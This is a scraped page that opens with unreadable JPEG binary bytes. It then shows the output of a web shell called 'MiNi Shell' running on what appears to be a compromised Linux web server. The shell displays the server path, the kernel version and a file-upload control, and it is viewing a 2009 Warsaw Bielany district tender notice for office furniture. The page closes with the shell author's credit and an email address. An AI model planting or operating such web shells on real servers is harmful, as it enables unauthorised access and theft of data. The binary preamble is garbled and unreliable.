JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090819/136679-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa wyposażenia meblowego do budynku Urzędu Dzielnicy Bielany m.st. Warszawy przy ul. Żeromskiego 29</b><br>
<b>Numer ogłoszenia: 136679 - 2009; data zamieszczenia: 19.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa - Dzielnica Bielany , ul. Przybyszewskiego 70/72, 01-824 Warszawa, woj. mazowieckie, tel. 022 8651935, faks 022 8644857.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bielany.waw.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Zamawiający nie zamierza zawierać umowy ramowej ani ustanawiać dynamicznego systemu zakupów.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia meblowego do budynku Urzędu Dzielnicy Bielany m.st. Warszawy przy ul. Żeromskiego 29.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wyposażenia meblowego do nowo wybudowanego ratusza Urzędu Dzielnicy Bielany m.st. Warszawy przy ul. Żeromskiego 29. Przedmiot zamówienia obejmuje dostawę mebli typowych, dostawę mebli wykonanych wg szczegółowego projektu, dostawę innych elementów meblowych.
Wykonawca powinien dostarczyć, rozmieścić i zamontować wyposażenie, którego wykaz, ilości  określone są w  opracowaniu p.n. Wykaz mebli do wykonania - stanowiący załącznik Nr 1 do SIWZ,  zaś parametry i wymogi są określone w Projekcie aranżacji wnętrz powierzchni biurowej - zestawienia meblowe - stanowiący załącznik Nr 2 do SIWZ, w pomieszczeniach w budynku znajdującym się przy ul. Żeromskiego 29, zgodnie z Projektem aranżacji wnętrz powierzchni biurowej - architektura- stanowiący załącznik Nr 3 do SIWZ oraz Projektem aranżacji wnętrz powierzchni biurowej - zestawienia meblowe (zał. nr 2 do SIWZ), opracowanym przez Firmę JMP Service. Zaleca się przed złożeniem oferty aby Wykonawca zapoznał się na miejscu z warunkami dostawy w szczególności sprawdzić miejsca, w które będzie wstawiane wyposażenie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 8 000,00 zł. (słownie: osiem  tysięcy złotych 00/100).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> III.2.1) O udzielenie zamówienia mogą ubiegać się wykonawcy nie wykluczeni na podstawie art. 24 ust. 1 i 2 oraz  spełniający warunki zawarte w art. 22 ust. 1 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku (tekst jednolity Dz. U. z 2007 r. Nr 223 poz.1655 ze zmianami), w tym: 

Zamawiający wymaga aby wykonawca wykazał, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, należycie wykonał conajmniej dwa zamówienia (jedno zamówienie = jedna umowa) w zakresie dostawy mebli biurowych, o wartości nie mniejszej niż 100 000,00 zł. (sto tysięcy złotych) brutto każde. Wymogiem jest aby wykazane zamówienia były poparte dokumentami o należytym ich wykonaniu np. referencje.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą /spełnia - nie spełnia/w oparciu o oświadczenia i dokumenty złożone przez wykonawcę w celu potwierdzenia warunków udziału w postępowaniu, z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> III.2.2) 
2.1). Oświadczenie, że wykonawca spełnienia warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych, wg wzoru określonego w zał. nr 7 do SIWZ;
W przypadku wykonawców występujących wspólnie dokument ten składa Pełnomocnik. 
2.2) Oświadczenie, że wykonawca nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2  ustawy - Prawo zamówień publicznych, wg wzoru określonego w zał. nr 7a do SIWZ;
W przypadku wykonawców występujących wspólnie dokument ten składają wszyscy wykonawcy wspólnie ubiegający się o zamówienie.
2.3)dokument potwierdzający dopuszczenie wykonawcy do obrotu prawnego  - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
W przypadku wykonawców występujących wspólnie dokument ten składają wszyscy Wykonawcy występujący wspólnie.  W przypadku złożenia kopii dokumentu, kopię tę za zgodność z oryginałem poświadcza Pełnomocnik.
2.4) Wykaz zamówień o którym mowa w SEKCJI III.2.1  - wg wzoru w załączniku nr 8 do SIWZ 
W przypadku wykonawców występujących wspólnie dokument ten składa pełnomocnik.
2.5) Dokumenty potwierdzające należyte wykonanie zamówień opisanych w SEKCJI III.2.1- np. referencje.
Oryginał lub kopia poświadczona przez wykonawcę. W przypadku wykonawców występujących wspólnie poświadcza za zgodność z oryginałem pełnomocnik.

Inne dokumenty wymagane w postępowaniu. 
1)Wypełniony druk OFERTA - zgodny w treści ze wzorem stanowiącym załącznik nr 5 do SIWZ;
W przypadku wykonawców występujących wspólnie dokument  ten składa Pełnomocnik.
2)Formularz cenowy - wg wzoru określonego w załączniku nr 6 do SIWZ
W przypadku wykonawców występujących wspólnie dokument  ten składa Pełnomocnik.
3)Pełnomocnictwo, w sytuacji gdy wykonawcę reprezentuje pełnomocnik lub w przypadku złożenia oferty wspólnej, zgodnie z wymogami opisanymi w Części III pkt. 3 SIWZ. 
Uwaga: Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, składa odpowiedni dokument określony w Sekcji III.2.2) ppkt.2.3 obowiązujący w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP (podstawa prawna - Rozporządzenie Prezesa Rady Ministrów z dnia 19 maja 2006 roku (Dz. U. z 2006 r. Nr 87 poz. 605 ) oraz zmiany wprowadzone rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniającym rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. nr 188, poz.1155)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bielany.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Wydziale Zamówień Publicznych dla Dzielnicy Bielany m.st. Warszawy przy ul. Schroegera 90 pok.5, (cena 68,00 zł.).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2009 godzina 10:00, miejsce: Wydział Zamówień Publicznych dla Dzielnicy Bielany m.st. Warszawy przy ul. Schroegera 90 pok. Nr 5..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com